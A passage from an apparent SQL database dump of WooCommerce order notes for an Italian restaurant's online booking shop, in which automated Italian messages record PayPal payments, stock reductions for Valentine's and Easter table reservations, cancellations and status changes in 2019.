7&rarr;6',0,'1','WooCommerce','order_note',0,0),(818,766,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 14:31:52','2019-02-13 13:31:52','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(819,767,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 15:19:12','2019-02-13 14:19:12','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(820,767,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 15:19:12','2019-02-13 14:19:12','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 6&rarr;5',0,'1','WooCommerce','order_note',0,0),(821,767,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 15:19:12','2019-02-13 14:19:12','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(822,768,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 15:31:50','2019-02-13 14:31:50','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(823,768,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 15:31:50','2019-02-13 14:31:50','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 5&rarr;4',0,'1','WooCommerce','order_note',0,0),(824,768,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 15:31:50','2019-02-13 14:31:50','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(825,769,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 19:39:12','2019-02-13 18:39:12','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(826,769,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 19:39:12','2019-02-13 18:39:12','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 4&rarr;3',0,'1','WooCommerce','order_note',0,0),(827,769,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 19:39:13','2019-02-13 18:39:13','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(828,770,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-14 10:03:34','2019-02-14 09:03:34','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(829,770,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-14 10:03:34','2019-02-14 09:03:34','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 3&rarr;2',0,'1','WooCommerce','order_note',0,0),(830,770,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-14 10:03:35','2019-02-14 09:03:35','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(831,771,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-14 12:04:42','2019-02-14 11:04:42','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(832,771,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-14 12:04:42','2019-02-14 11:04:42','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 2&rarr;1',0,'1','WooCommerce','order_note',0,0),(833,771,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-14 12:04:43','2019-02-14 11:04:43','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(834,772,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-14 14:37:05','2019-02-14 13:37:05','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(835,772,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-14 14:37:05','2019-02-14 13:37:05','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 3&rarr;2',0,'1','WooCommerce','order_note',0,0),(836,772,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-14 14:37:06','2019-02-14 13:37:06','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(837,773,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-14 19:19:11','2019-02-14 18:19:11','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(838,773,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-14 19:19:11','2019-02-14 18:19:11','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 2&rarr;1',0,'1','WooCommerce','order_note',0,0),(839,773,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-14 19:19:11','2019-02-14 18:19:11','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(840,775,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-03-06 14:08:04','2019-03-06 13:08:04','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(841,775,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-03-06 14:08:05','2019-03-06 13:08:05','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(842,777,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-03-12 16:10:12','2019-03-12 15:10:12','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(843,777,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-03-12 16:10:14','2019-03-12 15:10:14','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(844,777,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-03-12 16:33:45','2019-03-12 15:33:45','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(845,781,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-03-25 18:18:57','2019-03-25 17:18:57','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(846,781,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-03-25 18:18:58','2019-03-25 17:18:58','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(847,780,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-03-25 19:02:41','2019-03-25 18:02:41','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(849,790,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-04 14:20:38','2019-04-04 12:20:38','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(850,791,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-04 14:52:44','2019-04-04 12:52:44','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(851,791,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-04 15:31:09','2019-04-04 13:31:09','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(852,791,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-04 15:31:09','2019-04-04 13:31:09','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone - Pasqua (pasqua-2pax) 5&rarr;4',0,'1','WooCommerce','order_note',0,0),(853,791,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-04 15:31:10','2019-04-04 13:31:10','Lo stato dell\'ordine è cambiato da Cancellato a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(854,792,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-04 21:32:32','2019-04-04 19:32:32','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(855,792,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-04 21:32:33','2019-04-04 19:32:33','Livelli del magazzino ridotti: Prenotazione Tavolo per 8 Persone - Pasqua (pasqua-8pax) 1&rarr;0',0,'1','WooCommerce','order_note',0,0),(856,792,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-04 21:32:33','2019-04-04 19:32:33','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(857,793,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-06 15:20:37','2019-04-06 13:20:37','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(858,793,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-06 15:20:37','2019-04-06 13:20:37','Livelli del magazzino ridotti: Prenotazione Tavolo per 5 Persone - Pasquetta (pasquetta-5pax) 1&rarr;0',0,'1','WooCommerce','order_note',0,0),(859,793,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-06 15:20:38','2019-04-06 13:20:38','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(860,794,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-09 12:11:18','2019-04-09 10:11:18','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(861,795,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-09 21:21:40','2019-04-09 19:21:40','Ordine annullato dal cliente. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(862,796,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-09 21:32:25','2019-04-09 19:32:25','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(863,796,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-09 21:32:26','2019-04-09 19:32:26','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone - Pasquetta (pasquetta-2pax) 5&rarr;4',0,'1','WooCommerce','order_note',0,0),(864,796,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-09 21:32:28','2019-04-09 19:32:28','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(865,797,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-09 23:30:15','2019-04-09 21:30:15','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(866,797,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-09 23:30:16','2019-04-09 21:30:16','Livelli del magazzino ridotti: Prenotazione Tavolo per 8 Persone - Pasquetta (pasquetta-8pax) 1&rarr;0',0,'1','WooCommerce','order_note',0,0),(867,797,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-09 23:30:17','2019-04-09 21:30:17','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(868,798,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-10 11:59:24','2019-04-10 09:59:24','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(869,798,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-10 11:59:25','2019-04-10 09:59:25','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(870,802,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-13 13:13:12','2019-04-13 11:13:12','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(871,802,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-13 13:13:13','2019-04-13 11:13:13','Livelli del magazzino ridotti: Prenotazione Tavolo per 4 Persone - Pasqua (pasqua-4pax) 3&rarr;2',0,'1','WooCommerce','order_note',0,0),(872,802,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-13 13:13:13','2019-04-13 11:13:13','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(873,803,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-13 15:28:16','2019-04-13 13:28:16','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(874,803,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-13 15:28:16','2019-04-13 13:28:16','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone - Pasqua (pasqua-2pax) 4&rarr;3',0,'1','WooCommerce','order_note',0,0),(875,803,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-13 15:28:17','2019-04-13 13:28:17','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(876,804,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-13 18:09:34','2019-04-13 16:09:34','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(877,804,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-13 18:09:34','2019-04-13 16:09:34','Livelli del magazzino ridotti: Prenotazione Tavolo per 5 Persone - Pasqua (pasqua-5pax) 1&rarr;0',0,'1','WooCommerce','order_note',0,0),(878,804,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-13 18:09:34','2019-04-13 16:09:34','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(879,805,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-13 18:34:30','2019-04-13 16:34:30','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(880,805,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-13 18:34:31','2019-04-13 16:34:31','Livelli del magazzino ridotti: Prenotazione Tavolo per 3 Persone - Pasquetta (pasquetta-3pax) 1&rarr;0',0,'1','WooCommerce','order_note',0,0),(881,805,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-13 18:34:31','2019-04-13 16:34:31','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(882,806,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-14 15:47:32','2019-04-14 13:47:32','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(883,806,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-14 15:47:33','2019-04-14 13:47:33','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone - Pasqua (pasqua-2pax) 3&rarr;2',0,'1','WooCommerce','order_note',0,0),(884,806,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-14 15:47:34','2019-04-14 13:47:34','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(885,807,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-15 17:44:36','2019-04-15 15:44:36','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(886,807,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-15 17:44:36','2019-04-15 15:44:36','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone - Pasquetta (pasquetta-2pax) 4&rarr;3',0,'1','WooCommerce','order_note',0,0),(887,807,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-15 17:44:37','2019-04-15 15:44:37','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(888,808,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-15 20:30:58','2019-04-15 18:30:58','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(889,809,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-17 15:02:59','2019-04-17 13:02:59','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(890,809,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-17 15:02:59','2019-04-17 13:02:59','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone - Pasqua (pasqua-2pax) 2&rarr;1',0,'1','WooCommerce','order_note',0,0),(891,809,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-17 15:03:00','2019-04-17 13:03:00','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(892,811,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-17 21:04:06','2019-04-17 19:04:06','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(893,811,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-17 21:04:07','2019-04-17 19:04:07','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone - Pasqua (pasqua-2pax) 1&rarr;0',0,'1','WooCommerce','order_note',0,0),(894,811,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-17 21:04:07','2019-04-17 19:04:07','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(895,810,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-17 21:17:23','2019-04-17 19:17:23','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(896,812,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-18 11:17:43','2019-04-18 09:17:43','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(897,804,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-18 19:49:03','2019-04-18 17:49:03','Pagamento refunded tramite IPN. Lo stato dell\'ordine è cambiato da In lavorazione a Rimborsato.',0,'1','WooCommerce','order_note',0,0),(898,814,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-19 11:23:37','2019-04-19 09:23:37','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(899,814,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-19 11:23:37','2019-04-19 09:23:37','Livelli del magazzino ridotti: Prenotazione Tavolo per 4 Persone - Pasqua (pasqua-4pax) 1&rarr;0',0,'1','WooCommerce','order_note',0,0),(900,814,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-19 11:23:37','2019-04-19 09:23:37','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(901,815,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-20 11:26:57','2019-04-20 09:26:57','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(902,815,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-20 11:26:58','2019-04-20 09:26:58','Livelli del magazzino ridotti: Prenotazione Tavolo per 4 Persone - Pasquetta (pasquetta-4pax) 3&rarr;2',0,'1','WooCommerce','order_note',0,0),(903,815,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-20 11:26:58','2019-04-20 09:26:58','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(904,817,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-20 13:48:20','2019-04-20 11:48:20','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(905,817,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-20 13:48:20','2019-04-20 11:48:20','Livelli del magazzino ridotti: Prenotazione Tavolo per 4 Persone - Pasqua (pasqua-4pax) 1&rarr;0',0,'1','WooCommerce','order_note',0,0),(906,817,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-20 13:48:20','2019-04-20 11:48:20','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(907,816,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-20 14:01:55','2019-04-20 12:01:55','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(908,816,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-20 14:01:55','2019-04-20 12:01:55','Livelli del magazzino ridotti: Prenotazione Tavolo per 3 Persone - Pasqua (pasqua-3pax) 1&rarr;0',0,'1','WooCommerce','order_note',0,0),(909,816,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-20 14:01:56','2019-04-20 12:01:56','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(910,818,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-20 20:08:36','2019-04-20 18:08:36','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(911,818,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-20 20:08:36','2019-04-20 18:08:36','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone - Pasqua (pasqua-2pax) 1&rarr;0',0,'1','WooCommerce','order_note',0,0),(912,818,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-20 20:08:37','2019-04-20 18:08:37','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(913,819,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-22 11:00:10','2019-04-22 09:00:10','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(914,819,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-22 11:00:11','2019-04-22 09:00:11','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone - Pasquetta (pasquetta-2pax) 2&rarr;1',0,'1','WooCommerce','order_note',0,0),(915,819,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-22 11:00:13','2019-04-22 09:00:13','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(916,820,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-23 19:09:03','2019-04-23 17:09:03','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(917,820,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-23 19:09:04','2019-04-23 17:09:04','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(918,820,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-04-23 19:14:44','2019-04-23 17:14:44','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(919,822,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-05-03 19:54:50','2019-05-03 17:54:50','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(920,822,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-05-03 19:54:51','2019-05-03 17:54:51','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(921,824,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-05-24 13:47:08','2019-05-24 11:47:08','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(922,824,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-05-24 13:47:09','2019-05-24 11:47:09','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(923,826,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-05-27 19:08:41','2019-05-27 17:08:41','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(924,826,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-05-27 19:08:45','2019-05-27 17:08:45','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(925,826,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-05-27 19:11:08','2019-05-27 17:11:08','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(926,828,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-06-05 16:28:40','2019-06-05 14:28:40','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(927,828,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-06-05 16:28:41','2019-06-05 14:28:41','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(928,828,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-06-05 16:30:28','2019-06-05 14:30:28','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(929,830,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-06-05 21:40:03','2019-06-05 19:40:03','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(930,830,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-06-05 21:40:04','2019-06-05 19:40:04','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(931,832,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-06-07 18:06:38','2019-06-07 16:06:38','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(932,832,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-06-07 18:06:41','2019-06-07 16:06:41','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(933,834,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-06-15 18:31:31','2019-06-15 16:31:31','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(934,834,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-06-15 18:31:32','2019-06-15 16:31:32','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(935,834,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-06-15 18:31:40','2019-06-15 16:31:40','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(936,836,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-06-16 12:50:49','2019-06-16 10:50:49','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(937,836,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-06-16 12:50:50','2019-06-16 10:50:50','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(938,838,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-06-18 10:58:58','2019-06-18 08:58:58','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(939,838,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-06-18 10:58:59','2019-06-18 08:58:59','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(982,857,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-07-18 13:00:09','2019-07-18 11:00:09','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(983,857,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-07-18 13:00:18','2019-07-18 11:00:18','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(984,859,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-07-18 18:27:47','2019-07-18 16:27:47','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(985,859,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-07-18 18:28:49','2019-07-18 16:28:49','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(986,886,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-07-27 16:40:18','2019-07-27 14:40:18','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(987,886,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-07-27 16:40:18','2019-07-27 14:40:18','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(988,887,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-08-09 15:57:23','2019-08-09 13:57:23','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(989,887,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-08-09 15:57:25','2019-08-09 13:57:25','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(990,888,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-08-14 13:12:48','2019-08-14 11:12:48','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(991,888,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-08-14 13:12:51','2019-08-14 11:12:51','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(992,891,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-08-14 16:44:00','2019-08-14 14:44:00','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(993,891,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-08-14 16:44:03','2019-08-14 14:44:03','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(994,889,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-08-14 17:12:45','2019-08-14 15:12:45','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(995,890,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-08-14 17:12:45','2019-08-14 15:12:45','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato 